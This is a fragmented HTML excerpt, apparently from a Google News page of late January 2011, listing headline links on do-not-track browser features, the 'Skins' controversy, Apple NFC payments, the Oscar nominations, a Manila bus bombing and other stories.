<span><a target="_blank" class="usg-AFQjCNEIR3qqw7II_X8azn_RfNVJcHt6tQ " href="http://gulfnews.com/news/region/palestinian-territories/pna-to-sue-al-jazeera-channel-1.751956" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw " title="ZDNet UK"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/KH3wcH3fa03OHM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw "> ZDNet UK </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGuDbOaMWITubQMDQRm3Vh0Egtf8g " href="http://www.cnn.com/2011/TECH/web/01/25/do.not.track.features.fc/" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.techtree.com/India/News/Mozilla_to_Add_Do-not-track_Feature_to_Firefox/551-114274-643.html" target="_blank" class="usg-AFQjCNFfT6geWCCP6E2QzH5FUqDG1X_6iQ " id="MAA4AEgHUAFgAmoCdXM">Mozilla to Add Do-not-track Feature to Firefox</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.switched.com/2011/01/25/google-mozilla-adding-new-do-not-track-features-to-browsers/" target="_blank" class="usg-AFQjCNERbSCK3kCQuoNkwZjlOSimSLZmSw " id="MAA4AEgHUAJgAmoCdXM">Google, Mozilla Adding New 'Do Not Track' Features to Browsers</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHKzocjpu5vlhh-D6N9fc595X4mmA " href="http://www.fudzilla.com/home/item/21654-firefox-google-chrome-adding-do-not-track-tools" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELbqLAIM8yn2z_8_-FVXf9K-dbYA " href="http://www.bbc.co.uk/go/rss/int/news/-/news/technology-12275750" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFcQaqnZQeJ6RKQKdpso-J76DugIA " href="http://online.wsj.com/article/SB10001424052748704213404576100441609997236.html?mod=googlenews_wsj" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHcZ0fugBcUA2k5qxjAGWVyS_21zQ " href="http://www.marketingpilgrim.com/2011/01/google-ad-track-blocker-%E2%80%9Ckeep-my-opt-outs%E2%80%9D-is-live.html" id="MAA4AEgHUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/uH0w557Gx5vRRM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA "> msnbc.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFctqmK23nef-iMoWXVheexj3Fc8Q " href="http://www.mtv.com/news/articles/1656569/skins-stars-despite-kissing-tony-tea-still-lesbian.jhtml" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nydailynews.com/entertainment/tv/2011/01/25/2011-01-25_skins_ep_2_recap_tea_tries_to_overcome_superiority_over_her_peers_group_faces_do.html" target="_blank" class="usg-AFQjCNH8bRcCEH29oi-7_xE6pfdD2yNA3g " id="MAA4AEgIUAFgAmoCdXM">'Skins'' Tea (Sofia Black-D'Elia) tries to overcome superiority over her peers</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.tvfanatic.com/2011/01/skins-review-tea/" target="_blank" class="usg-AFQjCNGde28JTbZjALerAo_OgFwYxHt0hw " id="MAA4AEgIUAJgAmoCdXM">Skins Review: Hot Lesbian Sex!!!</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEfWuNgYPg0ZILv5hSzruDwtuhpzQ " href="http://www.tmz.com/2011/01/24/skins-schick-mtv-commercial-pulled-ptc/" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNENXxi-UPCdca1EUVCju-ionMEWqA " href="http://tunedin.blogs.time.com/2011/01/25/the-morning-after-second-skins/" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGe7TwFsxpL5X7U8Mw3VwnLra2q2g " href="http://watching-tv.ew.com/2011/01/24/skins-mtv-child-porn-jersey-shore/" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFeivtzBnx1HNPVs32vSjfRu97pGA " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406396.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg " title="Siliconrepublic.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/JQezVTDMGKi-tM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg "> Siliconrepu... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFCBrtD7WCE0PtKw7H7t44smvuv5w " href="http://www.appleinsider.com/articles/11/01/25/apple_finalizing_wireless_e_wallet_for_iphone_5_ipad_2_report.html" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://mashable.com/2011/01/25/apple-nfc-iphone-ipad/" target="_blank" class="usg-AFQjCNGm6-ErpYiEamahs9RkfVGAzI01dg " id="MAA4AEgJUAFgAmoCdXM">Apple to Add NFC Functionality to iPhone and iPad [REPORT]</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.mobileburn.com/news.jsp?Id=12601" target="_blank" class="usg-AFQjCNEWDXM8PnAha4yiIzgRne1A7thEHQ " id="MAA4AEgJUAJgAmoCdXM">Apple planning NFC mobile payment system for iPhone, iPad 2</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHW5C8tZea1E7rask8sdgGgqH1sqA " href="http://www.pcworld.com/article/217649/new_iphones_ipad_likely_to_become_ewallets.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNESRVBr6N4Mw53zwxbWqMXsPJcc9w " href="http://www.bloomberg.com/news/2011-01-25/apple-plans-service-that-lets-iphone-users-pay-with-handsets.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGtHdkHfBoAIG1s9jPpelMaz6s2AA " href="http://www.techtree.com/India/News/Next_iPhone_iPad_will_let_You_Make_Purchases/551-114271-893.html" id="MAA4AEgJUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPeOouT9CckF0mUYysL730O7lrOg " href="http://www.ibtimes.com/articles/104716/20110125/apple-iphone-visa-mastercard-paypal-ebay-ipad-iphone-5-ipad-2-nfc-itunes-iad-google-google-checkout-.htm" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ " title="USA Today"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/tCst1ur0hPb3fM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ "> USA Today </a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/popcandy/post/2011/01/what-do-you-think-of-the-oscar-nominations/1" target="_blank" class="usg-AFQjCNF_4suxPRRgxXoa_8Zp5SHu3jf6jQ " id="MAA4AEgKUAFgAmoCdXM">What do you think of the Oscar nominations?</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/film/2011/jan/25/oscars-colin-firth" target="_blank" class="usg-AFQjCNF7qCUzn_UOiBN60Cf4v4CoXreHbg " id="MAA4AEgKUAJgAmoCdXM">The King's Speech scores royal flush with 12 nods</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHod9JjR9y4F2FvohSndj5Y6BMBVw " href="http://www.chron.com/disp/story.mpl/ap/top/all/7396519.html" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEsu-DnmHIBuFL0DwwwRk8Vd4hjlw " href="http://www.mtv.com/news/articles/1656582/2011-oscar-nominations.jhtml" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEZ3l0V53faVCkMEw9KKd-PDkiE8w " href="http://www.cbsnews.com/stories/2011/01/25/entertainment/main7280739.shtml" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHL90AF5QbOJ_4UIYIc-Ile0M2y9w " href="http://www.baltimoresun.com/news/sns-ap-us-oscar-nominations,0,4030183.story?track=rss" id="MAA4AEgKUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA " title="Telegraph.co.uk"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/mJexcsYegVtuIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA "> Telegraph.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFD01jlTzuVK-p78scDRYNO2eREHw " href="http://www.computerworld.com/s/article/9205878/2011_Year_of_the_desktop_app_store_" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.itproportal.com/2011/01/25/apple-app-store-goes-twitter/" target="_blank" class="usg-AFQjCNFFkgai6RxcDNfWyhHhpN-QWkC5dw " id="MAA4AEgLUAFgAmoCdXM">Apple App Store Goes On Twitter</a>
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-17852_3-20029276-71.html" target="_blank" class="usg-AFQjCNG8H2VktqAMsHReFNwIgHjafJM5Wg " id="MAA4AEgLUAJgAmoCdXM">Woman hangs up on $10000 call from Apple</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4NKmZ-bO-krcRyPLnbE7HadO1ng " href="http://technolog.msnbc.msn.com/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGzIPukqq0qd92l2yykeeaIvVTHug " href="http://www.bbc.co.uk/go/rss/int/news/-/newsbeat/12266806" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVgc2xuik70cWhAMH-Br_p_sihpA " href="http://www.mercurynews.com/business/ci_17186613" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEmx71C1yiEGag4s2BvqaGBYMUQ3w " href="http://www.informationweek.com/news/hardware/handheld/showArticle.jhtml?articleID=229100083&cid=RSSfeed_IWK_News" id="MAA4AEgLUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg " title="Straits Times"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/oq6s9DrJF70jrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg "> Straits Tim... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGlOjCTDT0I5KjFM2nF9seR-UU1nA " href="http://www.allheadlinenews.com/briefs/articles/90032032?Heart%20disease%20costs%20expected%20to%20triple%20by%202030" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://timesofindia.indiatimes.com/life-style/health-fitness/health/Lowering-BP-in-women-cuts-heart-disease-risk/articleshow/7361366.cms" target="_blank" class="usg-AFQjCNFVzg8Nh2UMpPqPxrXXGOK8ja_MPw " id="MAA4AEgMUAFgAmoCdXM">Lowering BP in women cuts heart disease risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.whec.com/news/stories/S1941039.shtml?cat=566" target="_blank" class="usg-AFQjCNE-xgnWt8tuHVa29gb4ru73IaOcRQ " id="MAA4AEgMUAJgAmoCdXM">Heart disease treatment costs expected to skyrocket</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE_rV0f77uJmyZiUMloBc2lXdf9Pw " href="http://www.webmd.com/hypertension-high-blood-pressure/news/20110124/heart-benefits-for-women-who-cut-hypertension" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYHaS-zthcCySdDAWNVHb4SLIrsw " href="http://ozarksfirst.com/fulltext?nxd_id=392206" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYF8ryq9Qwqi_CVynhSfiniesEPA " href="http://smartabouthealth.net/diseases/2011/01/25/blood-pressure-in-women-tied-to-risk-of-heart-disease/" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA " title="Reuters India"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/cVcigKnuY3OZyM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://in.reuters.com/article/idINIndia-54381820110125" class="usg-AFQjCNGTd8WpG5SMNJTPCFWUSIrebxZMEA "> Reuters Ind... </a>
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=eVzgsG-PBuQ">Video: 
Manila Bus Blast Leaves 4 Dead
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSTRE70O1MV20110125" target="_blank" class="usg-AFQjCNG_i6tDzBrxVpfguEeyJgBOYOX5Rg " id="MAA4AEgNUAFgAmoCdXM">Four dead in Manila bus bombing; investigation starts</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGaMMS9N7gYyG5t5xc-JnYXzRSF5w " href="http://www.npr.org/templates/story/story.php?storyId=133201226" id="MAA4AEgNUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH9sGGWcAU2di9fzAAd-AOuP_4BpA " href="http://edition.cnn.com/2011/WORLD/asiapcf/01/25/philippines.bus.bomb/" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGOxAIjsdF8I5HXIRAIm5yNB8OCHQ " href="http://www.voanews.com/english/news/asia/Philippines-Bus-Blast-Kills-2-114536154.html" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " title="Los Angeles Times"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/KWy1eKrr9yjBVM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg "> Los Angeles... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nacsonline.com/NACS/News/Daily/Pages/ND0125111.aspx" target="_blank" class="usg-AFQjCNEr5zGblJr5ydUyiba1wOen29-Mbw " id="MAA4AEgOUAFgAmoCdXM">Front-of-Pack Nutrition Labeling Initiative Launched</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406470.html" target="_blank" class="usg-AFQjCNHk9NOZPdqDFXddElh8m_lvKF2RbA " id="MAA4AEgOUAJgAmoCdXM">Firms bring nutrition labels to fore</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamcPA0SL6kfHK0IbhjdKzrrU4yw " href="http://feeds.nytimes.com/click.phdo?i=4171574b1677b0877e85e5954148e69c" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGpdj32WiL_7ZiNsnnO8kzBHN3vGA " href="http://www.reuters.com/article/idUSTRE70O04520110125?feedType=RSS&feedName=domesticNews" id="MAA4AEgOUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGD_63K7i33pVnceXZLkDTbaItsoQ " href="http://www.usatoday.com/yourlife/food/diet-nutrition/2011-01-25-foodfight25_ST_N.htm" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIPTWyFOwFFj7H73Cs27lKSft3pQ " href="http://www.boston.com/business/articles/2011/01/25/nutrition_information_aimed_at_package_fronts/" id="MAA4AEgOUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/wd2GJA09xMOOhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110121/ivory-coast-gbagbo-orders-un-vehicles-searched-110121/" class="usg-AFQjCNGRo6b-o5f6RtdHla89EEao1mK4LQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGh3ZjVoZGGhNMSHQsQxFWCIjQhDQ " href="http://www.voanews.com/english/news/africa/AU-Chief-in-Ivory-Coast-for-Talks-with-Rival-Leaders-114558329.html" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/cocoa-fluctuates-as-ivory-coast-permits-some-bean-exports-sugar-declines.html" target="_blank" class="usg-AFQjCNE3qOBHQefJ2oBBLri58rbv9LJZtQ " id="MAA4AEgPUAFgAmoCdXM">Cocoa Fluctuates as Ivory Coast Permits Some Bean Exports; Sugar Declines</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGurqi_xasll9AJrXYC-1MiIemnNw " href="http://allafrica.com/stories/201101250644.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHFY83V_AAfjDtJZVh0a4dwPgg4bw " href="http://www.reuters.com/article/idUSLDE70O14P20110125" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEBPU1Hcc-7k2RJJ76c88A5ASiKQw " href="http://af.reuters.com/article/investingNews/idAFJOE70O0EI20110125" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxQjL0Xe0xQJO9mKL3moYUdYmacQ " href="http://www.businessweek.com/news/2011-01-25/ivory-coast-s-ouattara-to-let-already-taxed-cocoa-to-be-shipped.html" id="MAA4AEgPUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw " title="ABC News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/Z8UKO03JuMuYfM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/Entertainment/slideshow/photos-oprah-winfrey-secret-halfsister-patricia--12298302" class="usg-AFQjCNFv3hauEKXd1KsbG6v3c4q6pDQOhw "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE7Fz5EwbxKGgzuAdjAkWwQIRJyKA " href="http://abcnews.go.com/Health/MindMoodNews/family-secrets-emotions-oprah-winfreys-revelation/story?id=12751870" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=ashZeYCLLKw">Video: 
Oprah Finds Sister She Didn't Know She Had
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406094.html" target="_blank" class="usg-AFQjCNHc8PRjJtA_r-6sLAipgOQmTkUeqw " id="MAA4AEgQUAFgAmoCdXM">Revelation of a half sister means an Oprah Winfrey family windfall</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHK46gYZdjQAXcbhaRli6LniG1SMQ " href="http://www.popfi.com/2011/01/25/oprahs-half-sister/" id="MAA4AEgQUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpy8YlETU0ho_a7R_kPPB1fFhD1w " href="http://www.associatedcontent.com/article/6262014/oprah_winfrey_reunites_with_halfsister.html" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHsWooEP8CzeSP994Mtc3uxXFR_Bg " href="http://www.philly.com/philly/entertainment/20110125_Sideshow__Oprah_reveals_her_secret__A_half-sister.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEbHZ1QnEfcooEG3W8c8YZWD5vHHA " href="http://www.people.com/people/article/0,,20460315,00.html?xid=rss-topheadlines" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/YNo9KTUQtZTd9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N2DK20110125" class="usg-AFQjCNHPMVKKNx2mawktOtZ7l5FnrWvoIQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFARx2P5zNvWZAz4sw2rt6U-UJwnA " href="http://www.allheadlinenews.com/briefs/articles/90032000?McDonald%26%23146%3Bs%20hints%20of%20price%20increase%20this%20year" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2416456020110124" target="_blank" class="usg-AFQjCNHjS3vYRRTlA-qvmPbstYY5-pM5DA " id="MAA4AEgRUAFgAmoCdXM">CORRECTED - UPDATE 2-McDonald's December sales disappoint; shares fall</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.nytimes.com/2011/01/25/business/25mcdonald.html?src=twrhp" target="_blank" class="usg-AFQjCNEFCjzArnAipLxhgmi02CYhoR5miQ " id="MAA4AEgRUAJgAmoCdXM">Profit Edges Up at McDonald's, and Its Prices Will, Too</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFPrMDRNs8vkUnzFLUmjvLLidTZvA " href="http://online.wsj.com/article/SB10001424052748703555804576101771527131098.html" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFfaDQUuI0976Cj63ad4cyPLpG_QQ " href="http://www.latimes.com/business/la-fi-0125-mcdonalds-20110124,0,874800.story" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUepzx7L2wWxrgonEJpWGfPPFYow " href="http://www.cnbc.com/id/41197027" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw " title="Boston Globe"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/qdO1rwvn09fEzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.boston.com/sports/football/articles/2011/01/24/nfl_will_close_cowboys_stadium_roof_for_super_bowl/" class="usg-AFQjCNEghBWCFdvufR4bE6_z6OuV5dZ0pw "> Boston Glob... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHFh2GvvfmSVeefor8vLmuG3eJekw " href="http://travel.usatoday.com/flights/post/2011/01/delta-adds-wisconsin-dfw-flights-for-super-bowl/140051/1" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bizjournals.com/milwaukee/morning_roundup/2011/01/pack-gear-flies-as-dallas-flights-added.html" target="_blank" class="usg-AFQjCNFYl1bXTkZw_8xO3jwfmtUTgUPDMQ " id="MAA4AEgSUAFgAmoCdXM">Pack gear flies as Dallas flights added</a>
...[SNIP]...
<div class="aa-inner"><a href="http://lifeinc.todayshow.com/_news/2011/01/25/5908197-nfl-playoffs-flash-strong-buy-signal-for-stocks" target="_blank" class="usg-AFQjCNEpW0cGFBYoPK2aOSpry6U8jDARlA " id="MAA4AEgSUAJgAmoCdXM">NFL playoffs flash strong 'buy' signal for stocks</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4oXCRQbj0GVx75XGEVBl7lgmJXw " href="http://bleacherreport.com/articles/584247-super-bowl-2011-everything-you-need-to-know-for-a-great-super-bowl-sunday/entry/44040-super-bowl-2011-should-you-pay-the-price-and-travel-to-dallas" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEqG8mxPehu8mJyffEBfUtvwnUaBQ " href="http://www.dallasnews.com/incoming/20110124-cowboys-owner-jerry-jones-excited-about-super-bowl-matchup.ece" id="MAA4AEgSUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhmIjnxiBjSPpTi6HciKDhhlJklQ " href="http://denver.sbnation.com/denver-broncos/2011/1/25/1954559/super-bowl-history-green-bay-packers-last-appearance-denver-broncos" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHeapDjp_UwWVx3OwaDOPDuOLCpZg " href="http://www.star-telegram.com/2011/01/24/2793479/jerry-jones-switches-focus-to.html" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
